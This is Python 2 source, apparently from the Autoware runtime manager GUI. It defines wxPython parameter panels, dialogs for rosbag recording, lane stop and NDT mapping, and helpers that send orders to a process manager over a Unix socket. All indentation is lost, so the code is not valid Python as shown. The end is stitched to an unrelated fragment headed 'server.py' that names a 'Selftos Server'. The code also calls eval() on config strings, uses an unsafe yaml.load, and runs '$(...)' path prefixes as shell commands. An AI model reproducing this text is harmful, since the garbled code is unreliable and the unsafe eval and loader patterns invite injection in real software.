def detach_func(self):
for var in self.prm.get('vars'):
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
if 'func' in gdic_v:
bak_stk_pop(gdic_v, 'func')
vp = gdic_v.get('var')
lst_remove_once(self.gdic.get('ext_toggle_enables', []), vp)
def in_msg(self, var):
if 'topic' not in self.prm or 'msg' not in self.prm:
return False
if self.tmp_msg is None:
klass_msg = globals().get( self.prm.get('msg') )
if klass_msg is None:
return False
self.tmp_msg = klass_msg()
(obj, attr) = msg_path_to_obj_attr(self.tmp_msg, var.get('name'))
return obj and attr in obj.__slots__
class VarPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.var = kwds.pop('var')
v = kwds.pop('v')
self.update = kwds.pop('update')
wx.Panel.__init__(self, *args, **kwds)
self.min = self.var.get('min')
self.max = self.var.get('max')
self.has_slider = self.min is not None and self.max is not None
self.lb = None
label = self.var.get('label', '')
self.kind = self.var.get('kind')
if self.kind == 'radio_box':
choices = self.var.get('choices', [])
style = wx.RA_SPECIFY_COLS if self.var.get('choices_style') == 'h' else wx.RA_SPECIFY_ROWS
self.obj = wx.RadioBox(self, wx.ID_ANY, label, choices=choices, majorDimension=0, style=style)
self.choices_sel_set(v)
self.Bind(wx.EVT_RADIOBOX, self.OnUpdate, self.obj)
return
if self.kind == 'menu':
choices = self.var.get('choices', [])
self.obj = wx.Choice(self, wx.ID_ANY, choices=choices)
self.choices_sel_set(v)
self.Bind(wx.EVT_CHOICE, self.OnUpdate, self.obj)
if label:
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
sizer_wrap((self.lb, self.obj), wx.HORIZONTAL, 0, flag, 4, self)
return
if self.kind == 'checkbox':
self.obj = wx.CheckBox(self, wx.ID_ANY, label)
self.obj.SetValue(v)
self.Bind(wx.EVT_CHECKBOX, self.OnUpdate, self.obj)
return
if self.kind == 'checkboxes':
item_n = dic_eval_if_str(self, self.var, 'item_n', 1)
self.obj = Checkboxes(self, item_n, label)
self.obj.set(v)
for box in self.obj.boxes:
self.obj.Bind(wx.EVT_CHECKBOX, self.OnUpdate, box)
return
if self.kind == 'toggle_button':
self.obj = wx.ToggleButton(self, wx.ID_ANY, label)
set_val(self.obj, v)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnUpdate, self.obj)
button_color_hdr_setup(self.obj)
return
if self.kind == 'hide':
self.Hide()
return
szr = wx.BoxSizer(wx.HORIZONTAL)
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
szr.Add(self.lb, 0, flag, 4)
if self.kind == 'path':
v = str(v)
v = path_expand_cmd(v)
v = os.path.expandvars(os.path.expanduser(v))
style = wx.TE_PROCESS_ENTER + wx_flag_get( self.var.get('str_flags', []) )
self.tc = wx.TextCtrl(self, wx.ID_ANY, str(v), style=style)
self.Bind(wx.EVT_TEXT_ENTER, self.OnUpdate, self.tc)
if self.kind in ('num', None):
if self.has_slider:
self.w = self.max - self.min
vlst = [ v, self.min, self.max, self.var['v'] ]
self.is_float = len( [ v_ for v_ in vlst if type(v_) is not int ] ) > 0
self.int_max = 1000 if self.is_float else self.max
self.int_min = 0 if self.is_float else self.min
self.slider = wx.Slider(self, wx.ID_ANY, self.get_int_v(), self.int_min, self.int_max)
self.Bind(wx.EVT_COMMAND_SCROLL, self.OnScroll, self.slider)
self.slider.SetMinSize((82, 27))
szr.Add(self.slider, 1, wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, 4)
else:
self.is_float = type(self.var['v']) is not int
self.tc.SetMinSize((40,27))
flag = wx.ALIGN_CENTER_VERTICAL
prop = 1 if self.kind == 'path' or self.kind == 'str' else 0
szr.Add(self.tc, prop, flag, 4)
if self.kind == 'path':
self.ref = wx.Button(self, wx.ID_ANY, 'Ref')
self.Bind(wx.EVT_BUTTON, self.OnRef, self.ref)
button_color_hdr_setup(self.ref)
self.ref.SetMinSize((40,29))
szr.Add(self.ref, 0, flag, 4)
if self.has_slider or self.kind == 'num':
vszr = wx.BoxSizer(wx.VERTICAL)
vszr.Add( self.create_bmbtn("inc.png", self.OnIncBtn) )
vszr.Add( self.create_bmbtn("dec.png", self.OnDecBtn) )
szr.Add(vszr, 0, wx.ALIGN_CENTER_VERTICAL)
self.SetSizer(szr)
def setup_tooltip(self):
if get_tooltips(self.var):
set_tooltips(self.obj, self.var)
if get_tooltip(self.var):
obj = self.lb if self.lb else (self if self.kind == 'radio_box' else self.obj)
set_tooltip(obj, self.var)
def create_bmbtn(self, filename, hdr):
dir = rtmgr_src_dir()
bm = wx.Bitmap(dir + filename, wx.BITMAP_TYPE_ANY)
style = wx.BORDER_NONE | wx.BU_EXACTFIT
obj = wx.lib.buttons.GenBitmapButton(self, wx.ID_ANY, bm, style=style)
self.Bind(wx.EVT_BUTTON, hdr, obj)
return obj
def get_v(self):
if self.kind in [ 'radio_box', 'menu' ]:
return self.choices_sel_get()
if self.kind in [ 'checkbox', 'toggle_button' ]:
return self.obj.GetValue()
if self.kind == 'checkboxes':
return self.obj.get()
if self.kind == 'hide':
return self.var.get('v')
if self.kind in [ 'path', 'str' ]:
return str(self.tc.GetValue())
if not self.has_slider and self.tc.GetValue() == '':
return ''
return self.get_tc_v()
def get_tc_v(self):
s = self.tc.GetValue()
v = str_to_float(s) if self.is_float else int(s)
if self.has_slider:
v = self.min if v < self.min else v
v = self.max if v > self.max else v
self.tc.SetValue(adjust_num_str(str(v)))
return v
def get_int_v(self):
v = self.get_tc_v()
if self.is_float:
v = int( self.int_max * (v - self.min) / self.w if self.w != 0 else 0 )
return v
def OnScroll(self, event):
iv = self.slider.GetValue()
s = str(iv)
if self.is_float:
v = self.min + float(self.w) * iv / self.int_max
s = str(Decimal(v).quantize(Decimal(str(self.get_step()))))
self.tc.SetValue(s)
self.update(self.var)
def OnIncBtn(self, event):
step = self.get_step()
self.add_v(step)
def OnDecBtn(self, event):
step = self.get_step()
self.add_v(-step)
def get_step(self):
step = self.var.get('step')
return step if step else 0.01 if self.is_float else 1
def add_v(self, step):
ov = self.get_v()
self.tc.SetValue(str(ov + step))
v = self.get_v()
if v != ov:
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnUpdate(self, event):
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnRef(self, event):
if file_dialog(self, self.tc, self.var) == wx.ID_OK:
self.update(self.var)
def choices_sel_get(self):
return self.obj.GetStringSelection() if self.var.get('choices_type') == 'str' else self.obj.GetSelection()
def choices_sel_set(self, v):
if self.var.get('choices_type') == 'str':
self.obj.SetStringSelection(v)
else:
self.obj.SetSelection(v)
def is_nl(self):
return self.has_slider or self.kind in [ 'path' ]
class MyDialogParam(rtmgr.MyDialogParam):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogParam.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
ok_lb_key = 'open_dialog_ok_label'
if dic_list_get(gdic, 'dialog_type', 'config') == 'open' and ok_lb_key in gdic:
self.button_1.SetLabel( gdic.get(ok_lb_key) )
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogDpm(rtmgr.MyDialogDpm):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogDpm.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
parent = self.panel_v
frame = self.GetParent()
self.frame = frame
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnLink(self, event):
obj = event.GetEventObject()
dic = { self.hyperlink_car : self.frame.button_car_dpm,
self.hyperlink_pedestrian : self.frame.button_pedestrian_dpm }
obj = dic.get(obj)
if obj:
self.frame.OnHyperlinked_obj(obj)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogCarPedestrian(rtmgr.MyDialogCarPedestrian):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogCarPedestrian.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
frame = self.GetParent()
self.frame = frame
self.SetTitle(prm.get('name', ''))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnLink(self, event):
obj = event.GetEventObject()
car_ped = { self.hyperlink_car : 'car', self.hyperlink_pedestrian : 'pedestrian' }.get(obj, 'car')
obj_key = self.gdic.get('car_pedestrian_obj_key', {}).get(car_ped)
obj = getattr(self.frame, 'button_' + obj_key, None) if obj_key else None
if obj:
self.frame.OnHyperlinked_obj(obj)
self.EndModal(0)
def OnClose(self, event):
self.EndModal(-1)
class MyDialogLaneStop(rtmgr.MyDialogLaneStop):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
rtmgr.MyDialogLaneStop.__init__(self, *args, **kwds)
self.frame = self.GetParent()
def update(self):
update_func = self.gdic.get('update_func')
if update_func:
update_func(self.pdic, self.gdic, self.prm)
def OnTrafficRedLight(self, event):
self.pdic['traffic_light'] = 0
self.update()
def OnTrafficGreenLight(self, event):
self.pdic['traffic_light'] = 1
self.update()
def OnTrafficLightRecognition(self, event):
pub = rospy.Publisher('/config/lane_stop', ConfigLaneStop, latch=True, queue_size=10)
msg = ConfigLaneStop()
if event.GetEventObject().GetValue():
msg.manual_detection = False
else:
msg.manual_detection = True
pub.publish(msg)
def OnOk(self, event):
self.EndModal(0)
def OnCancel(self, event):
self.EndModal(-1)
class MyDialogNdtMapping(rtmgr.MyDialogNdtMapping):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.pdic_bak = self.pdic.copy()
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
rtmgr.MyDialogNdtMapping.__init__(self, *args, **kwds)
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=self.pdic, gdic=self.gdic, prm=self.prm)
sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.update_filename()
self.klass_msg = ConfigNdtMappingOutput
self.pub = rospy.Publisher('/config/ndt_mapping_output', self.klass_msg, queue_size=10)
def update_filename(self):
tc = self.text_ctrl_path
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'autoware-%02d%02d%02d.pcd' % (
now.year % 100, now.month, now.day)
path = os.path.join(dn, fn)
set_path(tc, path)
def OnRef(self, event):
tc = self.text_ctrl_path
file_dialog(self, tc, { 'path_type' : 'save' } )
def OnRadio(self, event):
v = self.radio_btn_filter_resolution.GetValue()
tc = self.text_ctrl_filter_resolution
tc.Enable(v)
def OnPcdOutput(self, event):
tc = self.text_ctrl_filter_resolution
v = tc.GetValue() if self.radio_btn_filter_resolution.GetValue() else '0.0'
msg = self.klass_msg()
msg.filename = self.text_ctrl_path.GetValue()
msg.filter_res = str_to_float(v)
self.pub.publish(msg)
def OnOk(self, event):
self.panel.detach_func()
self.EndModal(0)
class InfoBarLabel(wx.BoxSizer):
def __init__(self, parent, btm_txt=None, lmt_bar_prg=90, bar_orient=wx.VERTICAL):
wx.BoxSizer.__init__(self, orient=wx.VERTICAL)
self.lb = wx.StaticText(parent, wx.ID_ANY, '')
self.bar = BarLabel(parent, hv=bar_orient, show_lb=False)
bt = wx.StaticText(parent, wx.ID_ANY, btm_txt) if btm_txt else None
self.Add(self.lb, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bar_orient == wx.VERTICAL:
sz = self.bar.GetSize()
sz.SetWidth(20)
self.bar.SetMinSize(sz)
self.Add(self.bar, 1, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bt:
self.Add(bt, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
else:
szr = wx.BoxSizer(wx.HORIZONTAL)
if bt:
szr.Add(bt, 0, 0, 0)
szr.Add(self.bar, 1, 0, 0)
self.Add(szr, 1, wx.EXPAND, 0)
self.lmt_bar_prg = lmt_bar_prg
def lb_set(self, txt, col):
self.lb.SetForegroundColour(col)
self.lb.SetLabel(txt);
self.Layout()
def bar_set(self, prg):
(col1, col2) = (wx.Colour(0,0,250), wx.Colour(0,0,128))
if prg >= self.lmt_bar_prg:
(col1, col2) = (wx.Colour(250,0,0), wx.Colour(128,0,0))
self.bar.set_col(col1, col2)
self.bar.set(prg)
class Checkboxes(wx.Panel):
def __init__(self, parent, item_n, lb):
wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize)
self.boxes = [ wx.CheckBox(self, wx.ID_ANY, lb + str(i)) for i in range(item_n) ]
vsz = wx.BoxSizer(wx.VERTICAL)
for j in range((item_n + 7) / 8):
hsz = wx.BoxSizer(wx.HORIZONTAL)
for i in range(8):
idx = j * 8 + i
if idx < len(self.boxes):
hsz.Add(self.boxes[idx], 0, wx.LEFT, 8)
vsz.Add(hsz)
self.SetSizer(vsz)
vsz.Fit(self)
def set(self, vs):
vs = vs if vs else [ True for box in self.boxes ]
for (box, v) in zip(self.boxes, vs):
box.SetValue(v)
def get(self):
return [ box.GetValue() for box in self.boxes ]
class BarLabel(wx.Panel):
def __init__(self, parent, txt='', pos=wx.DefaultPosition, size=wx.DefaultSize, style=0, hv=wx.HORIZONTAL, show_lb=True):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lb = wx.StaticText(self, wx.ID_ANY, '', style=style)
self.txt = txt
self.hv = hv
self.dir = wx.SOUTH if hv == wx.HORIZONTAL else wx.EAST
self.show_lb = show_lb
self.prg = -1
self.dflt_col1 = wx.Colour(250,250,250)
self.dflt_col2 = wx.Colour(128,128,128)
self.col1 = self.dflt_col1
self.col2 = self.dflt_col2
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, prg):
self.prg = prg
if self.show_lb:
self.lb.SetLabel(self.txt + str(prg) + '%' if prg >= 0 else '')
self.Refresh()
def set_col(self, col1, col2):
self.col1 = col1 if col1 != wx.NullColour else self.dflt_col1
self.col2 = col2 if col2 != wx.NullColour else self.dflt_col2
def clear(self):
self.set(-1)
def OnPaint(self, event):
dc = wx.PaintDC(self)
(w,h) = self.GetSize()
if self.IsEnabled():
p = (w if self.hv == wx.HORIZONTAL else h) * self.prg / 100
rect = wx.Rect(0, 0, p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, h-p, w, p)
dc.GradientFillLinear(rect, self.col1, self.col2, self.dir)
rect = wx.Rect(p, 0, w-p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, 0, w, h-p)
dc.GradientFillLinear(rect, wx.Colour(200,200,200), wx.Colour(220,220,220), self.dir)
else:
rect = wx.Rect(0, 0, w, h)
dc.GradientFillLinear(rect, wx.Colour(250,250,250), wx.Colour(250,250,250), self.dir)
class ColorLabel(wx.Panel):
def __init__(self, parent, lst=[], pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lst = lst
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, lst):
self.lst = lst
self.Refresh()
def OnPaint(self, event):
dc = wx.PaintDC(self)
dc.Clear()
#change_font_point_by_rate(dc, 0.75)
(x,y) = (0,0)
(_, h, _, _) = dc.GetFullTextExtent(' ')
for v in self.lst:
if type(v) is tuple and len(v) == 2:
(x,y) = v
elif type(v) is tuple and len(v) == 3:
dc.SetTextForeground(v)
elif v == '\n':
(x,y) = (0,y+h)
elif type(v) is str:
dc.DrawText(v, x, y)
(w, _, _, _) = dc.GetFullTextExtent(v)
x += w
class StrValObj:
def __init__(self, s, v):
self.s = s
self.v = v
def GetValue(self):
return self.v
def SetValue(self, v):
self.v = v
class MyApp(wx.App):
def OnInit(self):
wx.InitAllImageHandlers()
frame_1 = MyFrame(None, wx.ID_ANY, "")
self.SetTopWindow(frame_1)
buttons_color_hdr_setup(frame_1)
frame_1.Show()
return 1
class MyDialogRosbagRecord(rtmgr.MyDialogRosbagRecord):
def __init__(self, *args, **kwds):
self.cmd_dic = kwds.pop('cmd_dic')
rtmgr.MyDialogRosbagRecord.__init__(self, *args, **kwds)
self.cbs = []
self.refresh()
self.parent = self.GetParent()
self.cmd_dic[ self.button_start ] = ('rosbag record', None)
self.toggles = [ self.button_start, self.button_stop ]
def OnRef(self, event):
tc = self.text_ctrl
file_dialog(self, tc, { 'path_type' : 'save' } )
def OnStart(self, event):
key_obj = self.button_start
path = self.text_ctrl.GetValue()
if path == '':
print('path=""')
return
topic_opt = []
if self.cbs[0].GetValue(): # 'All'
topic_opt = [ '-a' ]
else:
for obj in self.cbs:
if obj.GetValue():
topic_opt += [ obj.GetLabel() ]
if topic_opt == []:
print('topic=[]')
return
args = topic_opt + [ '-O', path ]
split_arg = [ '--split' ] if self.checkbox_split.GetValue() else []
size_arg = self.size_arg_get()
if split_arg and not size_arg:
wx.MessageBox('size is required, with split')
return
args += split_arg + size_arg
(cmd, proc) = self.cmd_dic[ key_obj ]
proc = self.parent.launch_kill(True, cmd, proc, add_args=args, obj=key_obj, kill_children=True)
self.cmd_dic[ key_obj ] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
def OnStop(self, event):
key_obj = self.button_start
(cmd, proc) = self.cmd_dic[ key_obj ]
proc = self.parent.launch_kill(False, cmd, proc, sigint=True, obj=key_obj, kill_children=True)
self.cmd_dic[ key_obj ] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
self.Hide()
def OnRefresh(self, event):
self.refresh()
def refresh(self):
lst = [ 'all' ] + subprocess.check_output([ 'rostopic', 'list' ]).strip().split('\n')
panel = self.panel_1
szr = self.sizer_topic
for obj in self.cbs:
szr.Remove(obj)
obj.Destroy()
self.cbs = []
for topic in lst:
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
bdr = 4 if topic == 'All' else 4 * 4
szr.Add(obj, 0, wx.LEFT, bdr)
self.cbs.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
self.update_filename()
def update_filename(self):
tc = self.text_ctrl
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'autoware-%04d%02d%02d%02d%02d%02d.rosbag' % (
now.year, now.month, now.day, now.hour, now.minute, now.second)
path = os.path.join(dn, fn)
set_path(tc, path)
def size_arg_get(self):
tc = self.text_ctrl_size
s = tc.GetValue()
mb = 0
try:
mb = str_to_float(s)
except ValueError:
mb = 0
if mb <= 0:
tc.SetValue('')
return [ '--size=' + str(int(mb * 1024 * 1024)) ] if mb > 0 else []
def file_dialog(parent, tc, path_inf_dic={}):
path = tc.GetValue()
path = get_top(path.split(','), path)
(dn, fn) = os.path.split(path)
path_type = path_inf_dic.get('path_type')
if path_type == 'dir':
fns = path_inf_dic.get('filenames')
if type(fns) is str and fns[-5:] == '.yaml':
fns = load_yaml(fns)
if type(fns) is not list:
fns = None
path_inf_dic['filenames'] = fns
dlg = wx.DirDialog(parent, defaultPath=path)
else:
st_dic = { 'save' : wx.FD_SAVE, 'multi' : wx.FD_MULTIPLE }
dlg = wx.FileDialog(parent, defaultDir=dn, defaultFile=fn,
style=st_dic.get(path_type, wx.FD_DEFAULT_STYLE))
ret = show_modal(dlg)
if ret == wx.ID_OK:
path = ','.join(dlg.GetPaths()) if path_type == 'multi' else dlg.GetPath()
if path_type == 'dir' and fns:
path = ','.join([ path + '/' + fn for fn in fns ])
set_path(tc, path)
dlg.Destroy()
return ret
def button_color_change(btn, v=None):
if v is None and type(btn) is wx.ToggleButton:
v = btn.GetValue()
key = ( v , btn.IsEnabled() )
dic = { (True,True):('#F9F9F8','#8B8BB9'), (True,False):('#F9F9F8','#E0E0F0') }
(fcol, bcol) = dic.get(key, (wx.NullColour, wx.NullColour))
btn.SetForegroundColour(fcol)
btn.SetBackgroundColour(bcol)
def OnButtonColorHdr(event):
btn = event.GetEventObject()
dic = { wx.EVT_TOGGLEBUTTON.typeId : None,
wx.EVT_LEFT_DOWN.typeId : True,
wx.EVT_LEFT_UP.typeId : False }
v = dic.get(event.GetEventType(), '?')
if v != '?':
button_color_change(btn, v)
event.Skip()
btn_null_bgcol = None
def is_btn_null_bgcol(btn):
global btn_null_bgcol
bak = btn.GetBackgroundColour()
if btn_null_bgcol is None:
btn.SetBackgroundColour(wx.NullColour)
btn_null_bgcol = btn.GetBackgroundColour()
if bak != btn_null_bgcol:
btn.SetBackgroundColour(bak)
return bak == btn_null_bgcol
def button_color_hdr_setup(btn):
hdr = OnButtonColorHdr
if type(btn) is wx.ToggleButton:
btn.Bind(wx.EVT_TOGGLEBUTTON, hdr)
elif type(btn) is wx.Button and is_btn_null_bgcol(btn):
btn.Bind(wx.EVT_LEFT_DOWN, hdr)
btn.Bind(wx.EVT_LEFT_UP, hdr)
def buttons_color_hdr_setup(frm_obj):
key = 'button_'
btns = [ getattr(frm_obj, nm) for nm in dir(frm_obj) if nm[:len(key)] == key ]
for btn in btns:
button_color_hdr_setup(btn)
def show_modal(dlg):
buttons_color_hdr_setup(dlg)
return dlg.ShowModal()
def load_yaml(filename, def_ret=None):
dir = rtmgr_src_dir()
path = dir + filename
if not os.path.isfile(path):
return def_ret
print('loading ' + filename)
f = open(dir + filename, 'r')
d = yaml.load(f)
f.close()
return d
def terminate_children(proc, sigint=False):
for child in psutil.Process(proc.pid).get_children():
terminate_children(child, sigint)
terminate(child, sigint)
def terminate(proc, sigint=False):
if sigint:
proc.send_signal(signal.SIGINT)
else:
proc.terminate()
def th_start(target, kwargs={}):
ev = threading.Event()
kwargs['ev'] = ev
th = threading.Thread(target=target, kwargs=kwargs)
th.daemon = True
th.start()
return (th, ev)
def th_end((th, ev)):
ev.set()
th.join()
def que_clear(que):
with que.mutex:
que.queue.clear()
def append_tc_limit(tc, s, rm_chars=0):
if rm_chars > 0:
tc.Remove(0, rm_chars)
tc.AppendText(s)
def cut_esc(s):
while True:
i = s.find(chr(27))
if i < 0:
break
j = s.find('m', i)
if j < 0:
break
s = s[:i] + s[j+1:]
return s
def change_font_point_by_rate(obj, rate=1.0):
font = obj.GetFont()
pt = font.GetPointSize()
pt = int(pt * rate)
font.SetPointSize(pt)
obj.SetFont(font)
def fix_link_color(obj):
t = type(obj)
if t is CT.GenericTreeItem or t is CT.CustomTreeCtrl:
obj.SetHyperTextVisitedColour(obj.GetHyperTextNewColour())
elif t is wx.HyperlinkCtrl:
obj.SetVisitedColour(obj.GetNormalColour())
def get_tooltip(dic):
return dic.get('desc')
def get_tooltips(dic):
return dic.get('descs', [])
def set_tooltip(obj, dic):
set_tooltip_str(obj, get_tooltip(dic))
def set_tooltip_str(obj, s):
if s and getattr(obj, 'SetToolTipString', None):
obj.SetToolTipString(s)
def set_tooltips(obj, dic):
lst = get_tooltips(dic)
if lst and getattr(obj, 'SetItemToolTip', None):
for (ix, s) in enumerate(lst):
obj.SetItemToolTip(ix, s)
def get_tooltip_obj(obj):
if getattr(obj, 'GetToolTip', None):
t = obj.GetToolTip()
return t.GetTip() if t else None
return None
def scaled_bitmap(bm, scale):
(w, h) = bm.GetSize()
img = wx.ImageFromBitmap(bm)
img = img.Scale(w * scale, h * scale, wx.IMAGE_QUALITY_HIGH)
return wx.BitmapFromImage(img)
def sizer_wrap(add_objs, orient=wx.VERTICAL, prop=0, flag=0, border=0, parent=None):
szr = wx.BoxSizer(orient)
for obj in add_objs:
szr.Add(obj, prop, flag, border)
if parent:
parent.SetSizer(szr)
return szr
def static_box_sizer(parent, s, orient=wx.VERTICAL):
sb = wx.StaticBox(parent, wx.ID_ANY, s)
sb.Lower()
return wx.StaticBoxSizer(sb, orient)
def wx_flag_get(flags):
dic = { 'top' : wx.TOP, 'bottom' : wx.BOTTOM, 'left' : wx.LEFT, 'right' : wx.RIGHT,
'all' : wx.ALL, 'expand' : wx.EXPAND, 'fixed_minsize' : wx.FIXED_MINSIZE,
'center_v' : wx.ALIGN_CENTER_VERTICAL, 'center_h' : wx.ALIGN_CENTER_HORIZONTAL,
'passwd' : wx.TE_PASSWORD }
lst = [ dic.get(f) for f in flags if f in dic ]
return reduce(lambda a,b : a+b, [0] + lst)
def msg_path_to_obj_attr(msg, path):
lst = path.split('.')
obj = msg
for attr in lst[:-1]:
obj = getattr(obj, attr, None)
return (obj, lst[-1])
def str_to_rosval(s, type_str, def_ret=None):
cvt_dic = {
'int8':int , 'int16':int , 'int32':int ,
'uint8':int , 'uint16':int , 'uint32':int ,
'int64':long , 'uint64':long,
'float32':float, 'float64':float,
}
t = cvt_dic.get(type_str)
s = s.replace(',','.') if t is float and type(s) is str else s
return t(s) if t else def_ret
def str_to_float(s):
return float( s.replace(',','.') )
def set_path(tc, v):
tc.SetValue(v)
tc.SetInsertionPointEnd()
def set_val(obj, v):
func = getattr(obj, 'SetValue', getattr(obj, 'Check', None))
if func:
func(v)
obj_refresh(obj)
if type(obj) is wx.ToggleButton:
button_color_change(obj)
def enables_set(obj, k, en):
d = attr_getset(obj, 'enabLes', {})
d[k] = en
d['last_key'] = k
obj.Enable( all( d.values() ) )
if isinstance(obj, wx.HyperlinkCtrl):
if not hasattr(obj, 'coLor'):
obj.coLor = { True:obj.GetNormalColour(), False:'#808080' }
c = obj.coLor.get(obj.IsEnabled())
obj.SetNormalColour(c)
obj.SetVisitedColour(c)
def enables_get(obj, k, def_ret=None):
return attr_getset(obj, 'enabLes', {}).get(k, def_ret)
def enables_get_last(obj):
k = enables_get(obj, 'last_key')
return (k, enables_get(obj, k))
def obj_refresh(obj):
if type(obj) is CT.GenericTreeItem:
while obj.GetParent():
obj = obj.GetParent()
tree = obj.GetData()
tree.Refresh()
# dic_list util (push, pop, get)
def dic_list_push(dic, key, v):
dic_getset(dic, key, []).append(v)
def dic_list_pop(dic, key):
dic.get(key, [None]).pop()
def dic_list_get(dic, key, def_ret=None):
return dic.get(key, [def_ret])[-1]
def bak_stk_push(dic, key):
if key in dic:
k = key + '_bak_str'
dic_getset(dic, k, []).append( dic.get(key) )
def bak_stk_pop(dic, key):
k = key + '_bak_str'
stk = dic.get(k, [])
if len(stk) > 0:
dic[key] = stk.pop()
else:
del dic[key]
def bak_stk_set(dic, key, v):
bak_str_push(dic, key)
dic[key] = v
def attr_getset(obj, name, def_ret):
if not hasattr(obj, name):
setattr(obj, name, def_ret)
return getattr(obj, name)
def dic_getset(dic, key, def_ret):
if key not in dic:
dic[key] = def_ret
return dic.get(key)
def lst_append_once(lst, v):
exist = v in lst
if not exist:
lst.append(v)
return exist
def lst_remove_once(lst, v):
exist = v in lst
if exist:
lst.remove(v)
return exist
def get_top(lst, def_ret=None):
return lst[0] if len(lst) > 0 else def_ret
def adjust_num_str(s):
if '.' in s:
while s[-1] == '0':
s = s[:-1]
if s[-1] == '.':
s = s[:-1]
return s
def rtmgr_src_dir():
return os.path.abspath(os.path.dirname(__file__)) + "/"
def path_expand_cmd(path):
lst = path.split('/')
s = lst[0]
if s[:2] == '$(' and s[-1] == ')':
cmd = s[2:-1].split(' ')
lst[0] = subprocess.check_output(cmd).strip()
path = '/'.join(lst)
return path
def eval_if_str(self, v):
return eval(v) if type(v) is str else v
def dic_eval_if_str(self, dic, key, def_ret=None):
return eval_if_str( self, dic.get(key, def_ret) )
def prn_dict(dic):
for (k,v) in dic.items():
print (k, ':', v)
def send_to_proc_manager(order):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(PROC_MANAGER_SOCK)
except socket.error:
print('Failed connect to {}'.format(PROC_MANAGER_SOCK))
return -1
sock.send(yaml.dump(order))
ret = sock.recv(1024)
sock.close()
return int(ret) == 0
def set_process_nice(proc, value):
order = {
"name": "nice",
"pid": proc.pid,
"nice": value
}
return send_to_proc_manager(order)
def set_process_cpu_affinity(proc, cpus):
order = {
"name": "cpu_affinity",
"pid": proc.pid,
"cpus": cpus,
}
return send_to_proc_manager(order)
def shutdown_proc_manager():
order = {
"name": "shutdown",
}
return send_to_proc_manager(order)
def set_scheduling_policy(proc, policy, priority):
order = {
"name": "scheduling_policy",
"pid": proc.pid,
"policy": policy,
"priority": priority,
}
return send_to_proc_manager(order)
if __name__ == "__main__":
gettext.install("app")
app = MyApp(0)
app.MainLoop()
# EOF
|
server.py
|
# [PROGRAM]
#
# Selftos Server by therenaydin.
